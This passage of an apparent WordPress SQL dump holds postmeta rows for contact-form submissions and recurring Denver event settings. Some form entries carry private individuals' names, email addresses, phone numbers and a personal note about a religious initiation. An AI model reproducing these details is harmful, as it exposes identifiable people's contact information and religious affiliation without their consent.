Pat'),(94819,261909,'_field_333','555-555-5555'),(94809,261908,'_field_313','Message'),(94810,261908,'_field_333','555-555-5555'),(94811,261908,'_field_314','choll.03@comcast.net'),(94812,261908,'_field_315','Test message 2'),(94813,261908,'_field_316','THis is a test.\n\nasdgafgadg\nasddsgadsgadgasdgdgadsga\nadsgadgsd'),(94814,261908,'_form_id','35'),(94815,261908,'_seq_num','38'),(94816,261909,'protect_children',''),(94817,261909,'_field_312','test 3'),(94818,261909,'_field_313','testing'),(96267,262168,'_form_id','8'),(96268,262168,'_seq_num','5'),(96932,262278,'_field_133','Catherine'),(96258,262167,'_form_id','13'),(96259,262167,'_seq_num','56'),(96260,262168,'_field_67','pat'),(96261,262168,'_field_68','winter'),(96262,262168,'_field_69','pwinter11@gmail.com'),(96263,262168,'_field_70','(303) 324-5805'),(96264,262168,'_field_71','Denver'),(96265,262168,'_field_74','Administrative Services'),(96257,262167,'_field_138','Hi - wasn\'t sure who to send this to - so here goes.... I no longer use my AOL email (pdwinter@aol.com). Please replace it with this Gmail address: pwinter11@gmail.com.\nthank you, gratefully yours, in ECK, Pat'),(96256,262167,'_field_137','new email address'),(96255,262167,'_field_135','pwinter11@gmail.com'),(97018,262286,'_field_294','Hi Fred,\n\nI have been invited to take my 5th initiation and I was wondering if you would agree to be the initiator?\nPlease let me know, either by email or phone.  Email:  ginnybrook@hotmail.com; phone: 303-830-8872\n\nThank you!\nGinny'),(97019,262286,'_form_id','32'),(97020,262286,'_seq_num','3'),(94808,261908,'_field_312','Test 2'),(94807,261908,'protect_children',''),(117440,262895,'_EventURL',''),(117719,262905,'_RTECregistrationsDisabled','1'),(117720,262905,'_RTECdeadlineType','start'),(117721,262905,'_RTECwhoCanRegister','any'),(117439,262895,'_EventCost',''),(117722,262905,'_RTEClimitRegistrations','0'),(117723,262905,'_RTECmaxRegistrations','30'),(117403,262893,'_EventStartDateUTC','2020-12-11 02:00:00'),(117404,262893,'_EventEndDateUTC','2020-12-11 03:30:00'),(117405,262893,'_EventDuration','5400'),(117406,262893,'_EventCurrencySymbol',''),(117407,262893,'_EventCurrencyPosition','prefix'),(117408,262893,'_EventCost',''),(117409,262893,'_EventURL',''),(117410,262893,'_EventTimezone','America/Denver'),(117411,262893,'_EventTimezoneAbbr','MST'),(120286,263018,'_EventEndDateUTC','2021-01-07 03:00:00'),(119955,263006,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1608756780;s:12:\"_EventOrigin\";i:1608756780;s:13:\"_thumbnail_id\";i:1608756780;s:24:\"boldgrid_hide_page_title\";i:1608756780;s:17:\"_EventShowMapLink\";i:1608756780;s:13:\"_EventShowMap\";i:1608756780;s:15:\"_EventStartDate\";i:1608756838;s:13:\"_EventEndDate\";i:1608756838;s:18:\"_EventStartDateUTC\";i:1608756838;s:16:\"_EventEndDateUTC\";i:1608756838;s:14:\"_EventDuration\";i:1608756780;s:20:\"_EventCurrencySymbol\";i:1608756780;s:22:\"_EventCurrencyPosition\";i:1608756780;s:10:\"_EventCost\";i:1608756780;s:9:\"_EventURL\";i:1608756780;s:14:\"_EventTimezone\";i:1608756780;s:18:\"_EventTimezoneAbbr\";i:1608756780;s:27:\"_EventNextPendingRecurrence\";i:1608756780;s:26:\"_RTECregistrationsDisabled\";i:1608756780;s:17:\"_RTECdeadlineType\";i:1608756780;s:19:\"_RTECwhoCanRegister\";i:1608756780;s:23:\"_RTEClimitRegistrations\";i:1608756780;s:21:\"_RTECmaxRegistrations\";i:1608756780;s:16:\"_EventRecurrence\";i:1608756780;s:18:\"_RTECnumRegistered\";i:1608756780;s:13:\"_EventVenueID\";i:1608756780;s:12:\"_dp_original\";i:1608756780;s:16:\"tribe_events_cat\";i:1609185766;s:10:\"_edit_last\";i:1608756838;s:11:\"post_status\";i:1608756838;s:12:\"post_content\";i:1608757013;}'),(119969,263006,'_EventEndDate','2021-01-18 20:00:00'),(119973,263006,'_EventCurrencySymbol',''),(119974,263006,'_EventCurrencyPosition','prefix'),(119975,263006,'_EventCost',''),(119976,263006,'_EventURL',''),(119977,263006,'_EventTimezone','America/Denver'),(116264,262808,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262803;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4500;}i:262804;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4500;}i:262805;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4500;}i:262806;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4500;}i:262807;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4500;}i:262808;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4500;}i:262809;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4500;}i:262810;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4500;}i:262811;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4500;}i:262812;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(114944,262808,'_EventStartDateUTC','2021-06-20 15:00:00'),(114945,262808,'_EventEndDate','2021-06-20 10:15:00'),(116263,262808,'_EventTimezone','America/Denver'),(114946,262808,'_EventEndDateUTC','2021-06-20 16:15:00'),(116261,262808,'_EventCost',''),(114947,262808,'_EventDuration','4500'),(116385,262857,'_EventCost',''),(116386,262857,'_EventURL',''),(114943,262808,'_EventStartDate','2021-06-20 09:00:00'),(116260,262808,'_EventCurrencyPosition','prefix'),(115760,262796,'_RTEClimitRegistrations','0'),(115761,262796,'_RTECmaxRegistrations','30'),(115762,262796,'boldgrid_hide_page_title','0'),(115763,262796,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:10:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(115753,262796,'protect_children',''),(115754,262796,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511404;s:12:\"_EventOrigin\";i:1607511404;s:13:\"_thumbnail_id\";i:1607511404;s:26:\"_RTECregistrationsDisabled\";i:1607511404;s:17:\"_RTECdeadlineType\";i:1607511404;s:19:\"_RTECwhoCanRegister\";i:1607511404;s:23:\"_RTEClimitRegistrations\";i:1607511404;s:21:\"_RTECmaxRegistrations\";i:1607511404;s:24:\"boldgrid_hide_page_title\";i:1607511404;s:16:\"_EventRecurrence\";i:1607511404;s:17:\"_EventShowMapLink\";i:1607511404;s:13:\"_EventShowMap\";i:1607511404;s:13:\"_EventVenueID\";i:1607511404;s:20:\"_EventCurrencySymbol\";i:1607511404;s:22:\"_EventCurrencyPosition\";i:1607511404;s:10:\"_EventCost\";i:1607511404;s:9:\"_EventURL\";i:1607511404;s:14:\"_EventTimezone\";i:1607511404;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511404;s:16:\"tribe_events_cat\";i:1607536604;}'),(115752,262796,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511404;s:12:\"_EventOrigin\";i:1607511404;s:13:\"_thumbnail_id\";i:1607511404;s:26:\"_RTECregistrationsDisabled\";i:1607511404;s:17:\"_RTECdeadlineType\";i:1607511404;s:19:\"_RTECwhoCanRegister\";i:1607511404;s:23:\"_RTEClimitRegistrations\";i:1607511404;s:21:\"_RTECmaxRegistrations\";i:1607511404;s:24:\"boldgrid_hide_page_title\";i:1607511404;s:16:\"_EventRecurrence\";i:1607511404;s:17:\"_EventShowMapLink\";i:1607511404;s:13:\"_EventShowMap\";i:1607511404;s:13:\"_EventVenueID\";i:1607511404;s:20:\"_EventCurrencySymbol\";i:1607511404;s:22:\"_EventCurrencyPosition\";i:1607511404;s:10:\"_EventCost\";i:1607511404;s:9:\"_EventURL\";i:1607511404;s:14:\"_EventTimezone\";i:1607511404;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511404;s:16:\"tribe_events_cat\";i:1607536604;}'),(116262,262808,'_EventURL',''),(116224,262807,'protect_children',''),(116225,262807,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511471;s:12:\"_EventOrigin\";i:1607511471;s:13:\"_thumbnail_id\";i:1607511471;s:26:\"_RTECregistrationsDisabled\";i:1607511471;s:17:\"_RTECdeadlineType\";i:1607511471;s:19:\"_RTECwhoCanRegister\";i:1607511471;s:23:\"_RTEClimitRegistrations\";i:1607511471;s:21:\"_RTECmaxRegistrations\";i:1607511471;s:24:\"boldgrid_hide_page_title\";i:1607511471;s:16:\"_EventRecurrence\";i:1607511471;s:17:\"_EventShowMapLink\";i:1607511471;s:13:\"_EventShowMap\";i:1607511471;s:13:\"_EventVenueID\";i:1607511471;s:20:\"_EventCurrencySymbol\";i:1607511471;s:22:\"_EventCurrencyPosition\";i:1607511471;s:10:\"_EventCost\";i:1607511471;s:9:\"_EventURL\";i:1607511471;s:14:\"_EventTimezone\";i:1607511471;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511471;s:16:\"tribe_events_cat\";i:1607536671;}'),(114632,262797,'_EventStartDate','2021-07-18 09:00:00'),(116223,262807,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511471;s:12:\"_EventOrigin\";i:1607511471;s:13:\"_thumbnail_id\";i:1607511471;s:26:\"_RTECregistrationsDisabled\";i:1607511471;s:17:\"_RTECdeadlineType\";i:1607511471;s:19:\"_RTECwhoCanRegister\";i:1607511471;s:23:\"_RTEClimitRegistrations\";i:1607511471;s:21:\"_RTECmaxRegistrations\";i:1607511471;s:24:\"boldgrid_hide_page_title\";i:1607511471;s:16:\"_EventRecurrence\";i:1607511471;s:17:\"_EventShowMapLink\";i:1607511471;s:13:\"_EventShowMap\";i:1607511471;s:13:\"_EventVenueID\";i:1607511471;s:20:\"_EventCurrencySymbol\";i:1607511471;s:22:\"_EventCurrencyPosition\";i:1607511471;s:10:\"_EventCost\";i:1607511471;s:9:\"_EventURL\";i:1607511471;s:14:\"_EventTimezone\";i:1607511471;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511471;s:16:\"tribe_events_cat\";i:1607536671;}'),(114633,262797,'_EventStartDateUTC','2021-07-18 15:00:00'),(114634,262797,'_EventEndDate','2021-07-18 10:10:00'),(114635,262797,'_EventEndDateUTC','2021-07-18 16:10:00'),(114636,262797,'_EventDuration','4200'),(115786,262797,'_EventShowMap','1'),(115787,262797,'_EventVenueID','262507'),(115788,262797,'_EventCurrencySymbol',''),(115789,262797,'_EventCurrencyPosition','prefix'),(115790,262797,'_EventCost',''),(115791,262797,'_EventURL',''),(115792,262797,'_EventTimezone','America/Denver'),(115793,262797,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262791;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4200;}i:262792;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4200;}i:262793;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4200;}i:262794;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4200;}i:262795;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4200;}i:262796;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4200;}i:262797;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4200;}i:262798;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4200;}i:262799;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4200;}i:262800;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4200;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(151812,266081,'one_occurrence','0'),(115778,262797,'_RTECregistrationsDisabled','1'),(115779,262797,'_RTECdeadlineType','start'),(115780,262797,'_RTECwhoCanRegister','any'),(115781,262797,'_RTEClimitRegistrations','0'),(115782,262797,'_RTECmaxRegistrations','30'),(115776,262797,'_EventOrigin','events-calendar'),(115783,262797,'boldgrid_hide_page_title','0'),(115784,262797,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:10:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(115785,262797,'_EventShowMapLink','1'),(115774,262797,'protect_children',''),(115775,262797,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511404;s:12:\"_EventOrigin\";i:1607511404;s:13:\"_thumbnail_id\";i:1607511404;s:26:\"_RTECregistrationsDisabled\";i:1607511404;s:17:\"_RTECdeadlineType\";i:1607511404;s:19:\"_RTECwhoCanRegister\";i:1607511404;s:23:\"_RTEClimitRegistrations\";i:1607511404;s:21:\"_RTECmaxRegistrations\";i:1607511404;s:24:\"boldgrid_hide_page_title\";i:1607511404;s:16:\"_EventRecurrence\";i:1607511404;s:17:\"_EventShowMapLink\";i:1607511404;s:13:\"_EventShowMap\";i:1607511404;s:13:\"_EventVenueID\";i:1607511404;s:20:\"_EventCurrencySymbol\";i:1607511404;s:22:\"_EventCurrencyPosition\";i:1607511404;s:10:\"_EventCost\";i:1607511404;s:9:\"_EventURL\";i:1607511404;s:14:\"_EventTimezone\";i:1607511404;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511404;s:16:\"tribe_events_cat\";i:1607536604;}'),(115773,262797,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511404;s:12:\"_EventOrigin\";i:1607511404;s:13:\"_thumbnail_id\";i:1607511404;s:26:\"_RTECregistrationsDisabled\";i:1607511404;s:17:\"_RTECdeadlineType\";i:1607511404;s:19:\"_RTECwhoCanRegister\";i:1607511404;s:23:\"_RTEClimitRegistrations\";i:1607511404;s:21:\"_RTECmaxRegistrations\";i:1607511404;s:24:\"boldgrid_hide_page_title\";i:1607511404;s:16:\"_EventRecurrence\";i:1607511404;s:17:\"_EventShowMapLink\";i:1607511404;s:13:\"_EventShowMap\";i:1607511404;s:13:\"_EventVenueID\";i:1607511404;s:20:\"_EventCurrencySymbol\";i:1607511404;s:22:\"_EventCurrencyPosition\";i:1607511404;s:10:\"_EventCost\";i:1607511404;s:9:\"_EventURL\";i:1607511404;s:14:\"_EventTimezone\";i:1607511404;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511404;s:16:\"tribe_events_cat\";i:1607536604;}'),(114662,262798,'_EventStartDate','2021-08-15 09:00:00'),(114663,262798,'_EventStartDateUTC','2021-08-15 15:00:00'),(114664,262798,'_EventEndDate','2021-08-15 10:10:00'),(114665,262798,'_EventEndDateUTC','2021-08-15 16:10:00'),(114666,262798,'_EventDuration','4200'),(115807,262798,'_EventShowMap','1'),(115808,262798,'_EventVenueID','262507'),(115809,262798,'_EventCurrencySymbol',''),(115810,262798,'_EventCurrencyPosition','prefix'),(115811,262798,'_EventCost',''),(115812,262798,'_EventURL',''),(115813,262798,'_EventTimezone','America/Denver'),(115814,262798,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262791;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4200;}i:262792;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4200;}i:262793;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4200;}i:262794;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4200;}i:262795;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4200;}i:262796;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4200;}i:262797;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4200;}i:262798;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4200;}i:262799;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4200;}i:262800;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4200;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(151811,266081,'mec_allday','0'),(115799,262798,'_RTECregistrationsDisabled','1'),(115800,262798,'_RTECdeadlineType','start'),(115801,262798,'_RTECwhoCanRegister','any'),(115802,262798,'_RTEClimitRegistrations','0'),(115803,262798,'_RTECmaxRegistrations','30'),(115797,262798,'_EventOrigin','events-calendar'),(115804,262798,'boldgrid_hide_page_title','0'),(115805,262798,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:10:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(115806,262798,'_EventShowMapLink','1'),(115795,262798,'protect_children',''),(115796,262798,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511404;s:12:\"_EventOrigin\";i:1607511404;s:13:\"_thumbnail_id\";i:1607511404;s:26:\"_RTECregistrationsDisabled\";i:1607511404;s:17:\"_RTECdeadlineType\";i:1607511404;s:19:\"_RTECwhoCanRegister\";i:1607511404;s:23:\"_RTEClimitRegistrations\";i:1607511404;s:21:\"_RTECmaxRegistrations\";i:1607511404;s:24:\"boldgrid_hide_page_title\";i:1607511404;s:16:\"_EventRecurrence\";i:1607511404;s:17:\"_EventShowMapLink\";i:1607511404;s:13:\"_EventShowMap\";i:1607511404;s:13:\"_EventVenueID\";i:1607511404;s:20:\"_EventCurrencySymbol\";i:1607511404;s:22:\"_EventCurrencyPosition\";i:1607511404;s:10:\"_EventCost\";i:1607511404;s:9:\"_EventURL\";i:1607511404;s:14:\"_EventTimezone\";i:1607511404;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511404;s:16:\"tribe_events_cat\";i:1607536604;}'),(115794,262798,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511404;s:12:\"_EventOrigin\";i:1607511404;s:13:\"_thumbnail_id\";i:1607511404;s:26:\"_RTECregistrationsDisabled\";i:1607511404;s:17:\"_RTECdeadlineType\";i:1607511404;s:19:\"_RTECwhoCanRegister\";i:1607511404;s:23:\"_RTEClimitRegistrations\";i:1607511404;s:21:\"_RTECmaxRegistrations\";i:1607511404;s:24:\"boldgrid_hide_page_title\";i:1607511404;s:16:\"_EventRecurrence\";i:1607511404;s:17:\"_EventShowMapLink\";i:1607511404;s:13:\"_EventShowMap\";i:1607511404;s:13:\"_EventVenueID\";i:1607511404;s:20:\"_EventCurrencySymbol\";i:1607511404;s:22:\"_EventCurrencyPosition\";i:1607511404;s:10:\"_EventCost\";i:1607511404;s:9:\"_EventURL\";i:1607511404;s:14:\"_EventTimezone\";i:1607511404;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511404;s:16:\"tribe_events_cat\";i:1607536604;}'),(114692,262799,'_EventStartDate','2021-09-19 09:00:00'),(116232,262807,'_RTECmaxRegistrations','30'),(114693,262799,'_EventStartDateUTC','2021-09-19 15:00:00'),(114694,262799,'_EventEndDate','2021-09-19 10:10:00'),(114695,262799,'_EventEndDateUTC','2021-09-19 16:10:00'),(114696,262799,'_EventDuration','4200'),(116696,262869,'_RTECregistrationsDisabled','1'),(115828,262799,'_EventShowMap','1'),(115829,262799,'_EventVenueID','262507'),(115830,262799,'_EventCurrencySymbol',''),(115831,262799,'_EventCurrencyPosition','prefix'),(115832,262799,'_EventCost',''),(115833,262799,'_EventURL',''),(115834,262799,'_EventTimezone','America/Denver'),(115835,262799,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262791;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4200;}i:262792;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4200;}i:262793;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4200;}i:262794;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4200;}i:262795;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4200;}i:262796;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4200;}i:262797;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4200;}i:262798;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4200;}i:262799;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4200;}i:262800;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4200;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(115820,262799,'_RTECregistrationsDisabled','1'),(115821,262799,'_RTECdeadlineType','start'),(115822,262799,'_RTECwhoCanRegister','any'),(115823,262799,'_RTEClimitRegistrations','0'),(115824,262799,'_RTECmaxRegistrations','30'),(115818,262799,'_EventOrigin','events-calendar'),(115825,262799,'boldgrid_hide_page_title','0'),(115826,262799,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:10:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(115827,262799,'_EventShowMapLink','1'),(115816,262799,'protect_children',''),(115817,262799,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511404;s:12:\"_EventOrigin\";i:1607511405;s:13:\"_thumbnail_id\";i:1607511405;s:26:\"_RTECregistrationsDisabled\";i:1607511405;s:17:\"_RTECdeadlineType\";i:1607511405;s:19:\"_RTECwhoCanRegister\";i:1607511405;s:23:\"_RTEClimitRegistrations\";i:1607511405;s:21:\"_RTECmaxRegistrations\";i:1607511405;s:24:\"boldgrid_hide_page_title\";i:1607511405;s:16:\"_EventRecurrence\";i:1607511405;s:17:\"_EventShowMapLink\";i:1607511405;s:13:\"_EventShowMap\";i:1607511405;s:13:\"_EventVenueID\";i:1607511405;s:20:\"_EventCurrencySymbol\";i:1607511405;s:22:\"_EventCurrencyPosition\";i:1607511405;s:10:\"_EventCost\";i:1607511405;s:9:\"_EventURL\";i:1607511405;s:14:\"_EventTimezone\";i:1607511405;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511405;s:16:\"tribe_events_cat\";i:1607536605;}'),(115815,262799,'_tribe_modified_fields','a:20:{s:16:\"protect_children\";i:1607511404;s:12:\"_EventOrigin\";i:1607511405;s:13:\"_thumbnail_id\";i:1607511405;s:26:\"_RTECregistrationsDisabled\";i:1607511405;s:17:\"_RTECdeadlineType\";i:1607511405;s:19:\"_RTECwhoCanRegister\";i:1607511405;s:23:\"_RTEClimitRegistrations\";i:1607511405;s:21:\"_RTECmaxRegistrations\";i:1607511405;s:24:\"boldgrid_hide_page_title\";i:1607511405;s:16:\"_EventRecurrence\";i:1607511405;s:17:\"_EventShowMapLink\";i:1607511405;s:13:\"_EventShowMap\";i:1607511405;s:13:\"_EventVenueID\";i:1607511405;s:20:\"_EventCurrencySymbol\";i:1607511405;s:22:\"_EventCurrencyPosition\";i:1607511405;s:10:\"_EventCost\";i:1607511405;s:9:\"_EventURL\";i:1607511405;s:14:\"_EventTimezone\";i:1607511405;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607511405;s:16:\"tribe_events_cat\";i:1607536605;}'),(116243,262807,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262803;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4500;}i:262804;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4500;}i:262805;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4500;}i:262806;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4500;}i:262807;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4500;}i:262808;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4500;}i:262809;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4500;}i:262810;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4500;}i:262811;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4500;}i:262812;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4500;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(116229,262807,'_RTECdeadlineType','start'),(116230,262807,'_RTECwhoCanRegister','any'),(116231,262807,'_RTEClimitRegistrations','0'),(114722,262800,'_EventStartDate','2021-10-17 09:00:00'),(114723,262800,'_EventStartDateUTC','2021-10-17 15:00:00'),(114724,262800,'_EventEndDate','2021-10-17 10:10:00'),(116228,262807,'_RTECregistrationsDisabled','1'),(114725,262800,'_EventEndDateUTC','2021-10-17 16:10:00'),(114726,262800,'_EventDuration','4200'),(122155,263246,'_EventCurrencyPosition','prefix'),(115849,262800,'_EventShowMap','1'),(115850,262800,'_EventVenueID','262507'),(115851,262800,'_EventCurrencySymbol',''),(115852,262800,'_EventCurrencyPosition','prefix'),(115853,262800,'_EventCost',''),(115854,262800,'_EventURL',''),(115855,262800,'_EventTimezone','America/Denver'),(115856,262800,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262791;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4200;}i:262792;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4200;}i:262793;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4200;}i:262794;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4200;}i:262795;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4200;}i:262796;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4200;}i:262797;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4200;}i:262798;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4200;}i:262799;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4200;}i:262800;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4200;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(151810,266081,'mec_certain_weekdays','a:0:{}'),(115841,262800,'_RTECregistrationsDisabled','1'),(115842,262800,'_RTECdeadlineType','start'),(115843,262800,'_RTECwhoCanRegister','any'),(115844,262800,'_RTEClimitRegistrations','0'),(115845,262800,'_RTECmaxRegistrations','30'),(115839,262800,'_EventOrigin','events-calendar'),(115846,262800,'boldgrid_hide_page_title','0'),(115847,262800,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 